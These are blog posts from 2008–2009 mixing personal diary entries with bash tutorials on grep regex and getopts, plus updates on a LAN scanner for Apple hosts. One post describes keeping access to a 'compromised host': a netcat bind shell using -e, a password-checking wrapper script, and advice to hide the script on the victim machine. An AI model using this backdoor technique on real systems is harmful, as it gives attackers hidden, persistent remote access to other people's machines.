Wednesday, January 21, 2009

Quick tutorial on regex with grep..

As of recently I have fallen in love with a certain some one. I don't know about you fellow readers (if there are any), but not keeping myself occupied, tends to make me think about her quite a bit. This also leads to anxiety and then my depression flairs out. So I'm trying to keep myself busy, which I have been. I'm also doing my best to control my emotions, but it's like I'm on the top of the world when I'm with her. :-)

I'm currently studying for my Comptia Security+ certification and along with that I'm taking a class at the local community college.

Now down to the regular expression tutorial...

First of all, what is regular expression? Well if you ask me, regular expression is a handly feature of grep. When you use the global regular expression parser, you can vet through data with specific precision. Along with that, you can use it for data types in variables, which under shell programming, doesn't technically support like if you were programming in C++ (i.e. defining variable types by using char, float, double, etc..) I will show you what I mean in a bit.

First let's do a simple regex example:

root@MonkeysInABarrel:~$echo Joe | grep -E '[[:alpha:]]{1,3}'

To invoke regex, you can either use egrep or use grep with the -E parameter. Next, you need to think of the field that you're going to be sifting for. In this example we're looking for 'Joe'.

In the next part where I start out with a ' , which tells grep where the field starts, and the other ' , tells where the field ends.

[[:alpha:]] dictates that we're looking for a field that is a letter field (letters a-z). Finally {1,3} specifies the length of the alpha string. For our instance, 'Joe' works just fine, because its in a range of letters from 1-3 (which the {1,3} specifies).

The output of the echo Joe and grep commands would simply just be 'Joe'.

Now for my example of specifying data types for variables in bash shell programming.

#!/bin/bash

echo "Enter a name:";

read answer;

answertest="$(echo ${answer} | grep -E '[[:alpha:]]{1,3}')";

if [[ "$answertest" ]]

then true;

else echo "You've entered something else...time to die!"; killfunction;

fi

Now here, firstly I'm echoing a prompt and then reading in the answer by using 'read'. (Here's the cool part.) I then setup a new variable called 'answertest' which is storing the output of echoing the value of the answer and then using regex to filter the answer. If the user were to enter a 2 or any number for that matter, the value of 'answertest' would be NULL. If the user were to enter a value of "Joe", the 'answertest' would contain Joe. I then use an if loop to test my value of 'answertest''. If the value of the variable is NULL, you will get the echo prompt and then the program dies. If the value of the variable contains data then the statement is true (which does nothing, and the program will continue executing.)

 

Sunday, December 21, 2008

A quick update..

Well I hope your holidays have been going well and that you're currently employed. I just thought I would let you (you as in the very small amount of people who look at my website) know that I have updated my unix scripts section with another useful script.

Take a look if you get a chance and happy holidays to you all.

 

Friday, December 19, 2008

Old man snow.. he has shuffled his dandruff over us!

Waking up around 1:00 p.m., to the sound of a snow blower and thinking that it was early in the morning, I peaked outside and unsurprisingly there was a new layer of snow outside. Come on, it's Decemeber in Michigan, what are you expecting? People overreact to the fact that we get dumped on with snow every winter.

I honeslty think people overreact due to the news. They turn on the news and the news is using fear as a tool for control / entertainment. Bam! Right in your face reads, "WINTER SNOW STORM WARNING IN AFFECT!". This is part of what grabs your attention, including the crazy music they have in the background, that builds up intensity. It will make some people go to the store to get ready for the next winter apocolypse.

Granted, I watch the news, don't get me wrong, but seriously people, we all must realize that the media is always going to over dramatize whatever they can, to get the ratings. The news is mostly 'factual' but also is entertainment, if it were up to me I would cut the crap and make the news pretty boring. Alongside that I would try to report more positive news, but I guess that's not normal. They think people only want to hear about the guy on the south side of town slinging crack and stabbing his neighbor over a game of poker. Hence, there is where the control from the media comes in. Keep the masses in fear and this will keep them within control and make them buy your crap.

Maybe I'm not the only one who thinks this.

Sunday, December 25, 2008

Happy holidays!! (To be politically correct)

Is it just me or does every Christmas seem to get more and more commercialized? What does Christmas or the Holidays generally mean to most businesses? Well I sure hope it would mean more business, unless you're in the lawn care business in Alaska. Businesses aside, if you ask me the true definition of what the Holidays mean to me would be the time spent with family and friends. Gifts and that shit aside, I would rather spend time with the individuals that I care about and who care about me. So when you open up a package of socks that were given to you as a gift and you've watched "The Christmas Story" for the billionith time, just be with the ones who you love. Don't worry if the you have to return whatever gift because it wasn't quite right, just remember that some one took the time to think about you. Also to semi-quote Andy Rooney, "if I had really wanted something, I would have bought it by now." Happy holidays to you all! Including the computers that are infected with malicious worms that connect to my web server from China.

 

 

 

Sunday, December 28, 2008

Ubuntu 8.04 > OpenSuse 11.1

Don't get me wrong, I'm not biast to any operating system, but when it comes to Linux distros, I like my distros that recognize 'ifconfig, iwlist, and iwconfig' etc.. without any modification.

As I rebuilt a rig that had a bad motherboard (which was an A8V deluxe that I adored), I decided to install OpenSuse 11.1 on one of the hard drives. Now, hear me on this; I started out in the Linux world with OpenSuse. I grew to love OpenSuse and depend upon it. Soon I found myself very curious about the oh-so popular 'Ubuntu'. I gave it a try and it grew on me like a fast growing wart. I adored it and became a big *deb* based user. At the time that I was used to it, iwlist, ifconfig and iwconfig worked just fine with it. (Implying older versions, but even now Ubuntu 8.10 still supports these commands.)

Now within my home network, I just don't want to have a bunch of Ubuntu and Windows rigs running. That doesn't seem very diverse. So I decided to install OpenSuse 11.1 on my rig that needed a new motherboard. Once I got the OS up and running, I discovered familiar and seemingly universal *nix commands would not function!! I thought to myself, "Wtf?!! These should work on most Linux OSes". But sadly no, even as a root user which a Google search implied to use, did not work for me. I will find myseufl adjusting to this..

It will be a bit of an annoyance at first, but I will adapt to this. In my humble opinion, right now I still prefer Ubuntu over OpenSuse. I need to keep myself open and adjust to diversity as needed. (So this is a big hint at the bots and individuals who feel the need to crack my webserver.. which may have already cracked without me knowing.) EDIT: Alrighty, I made a boo-boo, I assumed that if you ran 'sudo' and then whatever command that needed admin rights to run would work. This is false under OpenSuse, you need to run 'su', type your password. You will then get root@whatever, and be able to run the typical *nix commands.

 

 

Monday, January 05, 2009

NameThatApple update!

For the few of those who might have used my shell script "NameThatApple" or "nta" for short, I have updated the code so that it performs tests more effectively with different *nix variants.

I will illustrate the potential problem (which I mended):

1.) Typical 'which' command outputs look like this:

root@somebox:~$which xhydra

/usr/bin/xhydra

2.) You can then test this output (which I use for testing if programs are installed on a system) by:

testforprog="$(which prog)"

if [[ "$testforprog" ]]

then true;

else echo "Prog doesn't seem to be installed.."; killfunction;

fi

What this 'if-loop' and delcaration of a variable is doing, is first loading the output of the 'which' command into a variable, which is then tested by the 'if-loop'. If the 'testforprog' variable contains any data, the if loop will then pass it off as true, and the program will continue executing. If there is no output loaded into the 'testforprog' '(like if the program isn't installed), the program will then call the kill function to kill the program.

This is fine and dandy for systems that show no output if the 'which' command is used in conjunction with a program that doesn't exist (i.e. which programthatdoesntexist, versus which ls), but on OpenSuse the 'which' command has different output as along with *BSD based systems. The output looks more like this:

root@someOpenSusebox:~$which stuff

which: no stuff in (/home/usr/bin/ ...etc.)

or..

root@someBSDbox:~$which stuff

stuff: Command not found.

Nta now tests for these conditions by using a couple calls to test functions. If you're curious as to how it looks.. download the script yourself! :-)

 

 

 

 

Monday, March 02, 2009

A quick lesson on getopts and an NTA update!

For those of you like me, who seek to learn shell scripting for the mere fun of it, will some times require shell scripts where we can have the users invoke arguments into the shell script. Granted, one could make a simple shell script that echoes, "What would you like to do?... Alright, now that we have this option, would would you like to do next?.. etc. etc.". This is timely and using ' read'over and over is not very efficient. So what would you use to make a program so that the user, uses by simply entering something like, someprogram.sh -p 127.0.0.1? Well you'll want to 'man getopts'. We will also be using a built-in shell function called 'case'. Have a look here if you want explanation on 'case'.

#!/bin/bash

function helplist() { echo "GetoptsExample.sh usage...";
echo "-h.............Will list help";
echo "-p.............Will ping an ip address passed to OPTARG";
}

while getopts "hp:" options; do
case $options in
[h]) helplist;;
[p]) iptest="$(echo ${OPTARG} | grep -E '[[:digit:]]{1,3}\.[[:digit:]]{1,3}\.[[:digit:]]{1,3}\.[[:digit:]]{1,3}')";
if [[ "$iptest" ]];
then ping ${iptest};
else echo "You need to enter a numeric ip address!";
fi
;;
[?]) helplist;;
esac
done

Firstly we are defining a function which is 'helplist'. The 'helplist' function contains echo statements which will print out the usage for this simple shell script. Without this, our user would be quite confused on how to use the help script. This is another aspect of getopts, it makes the use of your shell script much easier for your users.

Next, comes the while loop. To my best understanding (and just trying to break this down into the english language), what the 'while' loop is doing, is assigning the getopts flags/arguments 'h' and 'p' to the variable options. Nextly, we begin our 'case' statement by making a 'case' in the value of 'options' (basically assigning what the flags mean / do). Then we have 'h' which requires no arguments. So for the user to use the 'h' option all they would have to enter is: ./GetoptsExample.sh -h. The reason being why 'h' does not need any arguments, is because there is no colon directly in front of it when we assign it to the options variable.

When the user enters ./GetoptsExample -h, the shell script will simply make a call to the predefined function 'helplist'. Also do take note that the call to the helplist function is double terminated (;;). This shows that you've reached the end of the statement in the 'case' that has been made. Do take note that without the double termination, your script will not function.

Now for the 'p' assignment. 'p' requires an argument in front of it due to the fact that it has a colon in front of it. One of the argument options are known as 'OPTARG'. (Which is a built in value in getopts.) For example, if we weren't testing the input from the user (which I'm about to explain next) and just echoing the value of 'OPTARG', the output of './GetopsExample.sh -p foobar' would simply be 'foobar'. 'OPTARG' was just assigned the value 'foobar'.

Instead, I have setup this example to test the user input for a numeric IP address. 'iptest' is assigned to the output of the value of 'OPTARG' being echoed and piped into a regular expression statement using 'grep'. Next, I perform a test on the value of 'iptest' to see if it's storing a value. If it doesn't store a value (say that it's not something like 127.0.0.1 ) it will echo out "You need to enter a numeric ip address!", which in this case the value of 'iptest' would be NULL.

On the other hand, if 'iptest' is storing a value, 'ping' will ping the value of iptest.

Next, in our 'options' case assignment, is the flag '?'. This is pretty nifty, it handles error checking for us. If the user were to enter ./GetopsExample.sh -k , (which the 'k' flag doesn't exist), the program will then make a call to the 'helplist' function. Lastly we end our 'case' statement with 'esac' and end our 'while' with 'done'.

NameThatApple update!

Monday, March 02, 2009

As promised earlier, I have updated NTA. This update includes a few new functions and tests. There is now a test to see if any hosts on the local subnet contain the AFP port 548 in the open state. The reason why I added this update, is because in a public location I had noticed an individual who had an Apple computer, which the MAC address of it showed up as 'UNKNOWN under nmap'. His computer name was not showing up under my results. My program originally just tests to see if there are Apple computers on the local area network by seeing if any computer has an Apple MAC address.

The owner may have spoofed his MAC address. After further investigation, I did discover that tcp port 548 was open on his computer. (Which is the Apple File sharing port). So this is why I decided to add a few new modules that test for this condition.

Basically, if there are any Apple MAC addresses on the LAN, it will try connecting to those, and it will do a port scan for any hosts who have tcp port 548 open. (It will also try to connect to these hosts as well. Bare in mind there may be duplicate hosts that will appear in the results.
Check the revised nta program!

Thursday, February 12, 2009

Authenticating yourself on a compromised host using netcat...

Good day fellow readers, hopefully you're doing well and haven't gone through any emotional roller coster rides in the past month as I have. (Yeah...the mentioning of that special some one in the last post whom I was seeing ...came to an abrupt end.. not that you care and I'm dislosing more information than what you need to know). Now enough of that.. now it's time for the main course.

If you haven't checked out a nifty program called netcat then please do so. For you Linux users please go here, and you Window$ users please go here. I put a link to securityfocus.com due to the fact that I haven't had any luck accessing vulnwatch.org.

Now if you need any tutorials on netcat, please have a look here.

One problem when you use netcat on a host that you have gained access to and use it as a way of access, is that netcat requires no authentication. So this means that anyone else who is using netcat can connect to the port that you have netcat listenning on.

For example:

This is the server side (the compromised host):

user@compromised-box:~$nc -vv -l -s CompromisedIPaddress -p 1234 -e /bin/bin

This is the client side (the attacker side):

user@evil-client:~$nc -vv CompromisedIPaddress 1234 -e

With this method, requires no authentication. So using this method is very insecure, along with that, netcat transmits information in clear text, so a good alternative to netcat would be cryptcat. For an attacker who just needs access and has fooled the victim to run a netcat script (or whatever method to get netcat running on the victim box) this is great. But what if we want to keep accessing this rig using netcat? I pondered this situation and decided to put my weak programming skills to use.

I've wrote a bash shell script that requires authentication for netcat users (if they set it up correctly). Let me show you the code.

#!/bin/bash

###A shell script that authenticates netcat users, who may have already had access to a compromised host####

PassSum="9f8e6dc67740727a61037f3a68266259"

echo "Enter your user name:";
read username;
echo "Enter your password:";
stty -echo
read password;
stty echo

echo ${username} > passfile;
echo ${password} >> passfile;

CheckSum="$(md5sum passfile | awk '{print $1}')";

if [[ ${PassSum} = ${CheckSum} ]]
then echo
"Welcome to the system.."; rm passfile; /bin/./bash;
else echo
"Failure!!"; rm passfile; exit 0
fi

Now this script has a predetermined MD5 hash sum. You must make your own hash sum to use this file. For this hash sum I simply made a file that looked like this:

abdi

thisisareallybadpassword

Where 'abdi' is the username and the 'thisisareallybadpassword' is self explanatory. Also this file contained no spaces and only one carriage return to seperate the username and password. I then did a md5sum check upon the file and the hash that was produced from this check is used in the shell script. If the user enters a username and password that doesn't match what is in the password file, the session will not be made. To set this shell script up on the victim host you would do:

user@compromised-box:~$nc -vv -L -s CompromisedIPaddress -p 1234 -e locationToShellScript.sh

An attacker might want to have this script hidden and in a location that isn't too obvious.

For those of you who want a better method of connecting to a compromised host (well vice versus for this instance) you may want to read this.

Thursday, February 12, 2009

NTA update!

Once I get the motivation and overcome this little period of depression, I will be updating 'NameThatApple'. The updates will include:

A 'which' module test. This module will test whether or not the user has the 'which' program installed.

An additional test to see if any hosts have port 548 (Apple file sharing port) open. I've noticed that under nmap, that sometimes some Apple computers' MAC addresses will show up as 'unknown'. So along with enumerating the MAC addresses in a local subnet, I will also setup 'NameThatApple' to look for hosts that have port 548 open and add them to a 'for' loop for host name enumeration.

 

Thursday, February 12, 2009

Cartoons note..

Within the next week I will be posting some hand drawn cartoons for any of my viewers. I just need that magical emotion 'motivation'. Just be patient! :-)

 

 

 

 

 

 

 

 

 

Thursday, December 18, 2008

A Steal!

While being unemployed, I have found myself with quite a bit of free time. So I try to generally keep myself busy and work on productive things. Without keeping myself occupied, I usually get depressed. (I think most people would). Oh yeah.. this is entitled 'A Steal!'. Let me explain. The other night I had a dream (a premonition if you will) that I went to some video game store and decided to get a cheap used console and some games.

Waking up and pondering that dream.. (Also pondered a Futurama episode where Fry wakes up from a dream that was a commercial), I thought to myself "Eh what the hell? Why not?" Don't get me wrong, video games in general are a waste of time. There are so many more productive things that one could do with their time, but if you're a bit of a nerd and have a soft spot for video games, you'll find yourself wasting hours playing pointless video games.

If you think about it, be-it Pong, Half-life 2, World of Warcraft, or whatever game you can think of, is that generally the time spent on these games is of the same value. The value of the time spent on video games is null. (Unless you're making cash.. that's a whole new story). So going out and buying the newest greatest console / computer system for gaming is out of the question and not within a reasonable budget for myself.

Being unemployed I thought to myself ,"Best to be frugal and not spend too much". I gave 'Play-n-Trade' a call, to get some price quotes on an Xbox and inquired about whether or not if they had 'Oddworld: Munch's Odyssey in stock. And whaddya know? They had an original Xbox for 40 bucks and they had the Oddworld game in stock! (Which cost 5 bucks). So I ran out to my local 'Play-n-Trade', and blew a wad o' cash on some new toys. Not the most productive of items to get, but money better spent on that, versus something more wasteful or what have you.


 

 

 

 

 

 

 

 

 

Best viewed with